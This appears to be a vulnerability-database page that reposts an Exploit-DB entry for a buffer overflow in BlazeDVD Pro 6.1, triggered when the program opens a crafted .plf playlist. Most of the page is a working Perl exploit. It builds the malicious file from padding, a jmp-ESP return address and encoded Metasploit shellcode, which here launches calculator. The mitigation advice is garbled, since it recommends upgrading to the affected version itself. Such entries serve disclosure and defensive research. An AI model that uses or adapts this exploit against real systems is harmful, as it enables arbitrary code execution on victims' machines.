XPSP3 - my $eip = pack('V',0x7c868667); #jmp ESP on kernel32.dll

vendor:

BlazeDVD Pro

by:

Exploit-DB

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: BlazeDVD Pro

Affected Version From: 6.1

Affected Version To: 6.1

Patch Exists: YES

Related CWE: N/A

CPE: a:blazevideo:blazedvd_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP service pack 2 (en)

2014

XPSP3 – my $eip = pack(‘V’,0x7c868667); #jmp ESP on kernel32.dll

A buffer overflow vulnerability exists in BlazeDVD Pro 6.1 when a specially crafted .plf file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a boundary error when handling .plf files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of BlazeDVD Pro 6.1

Source

Exploit-DB raw data:

## Exploit-DB Note: XPSP3 - my $eip = pack('V',0x7c868667); #jmp ESP on kernel32.dll 



# Date: Tue Apr 8 2014 
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows XP service pack 2 (en)

my $file= "blazeExpl.plf";
my $junk= "A" x 260;

my $eip = pack('V',0x7C82385D); #jmp ESP on kernel32.dll

my $prependesp = "XXXX";  #add 4 bytes so ESP points at beginning of shellcode bytes

my $shellcode = "\x90" x 25;   #start shellcode with some NOPS

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc

$shellcode = $shellcode . "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "plf File Created successfully\n";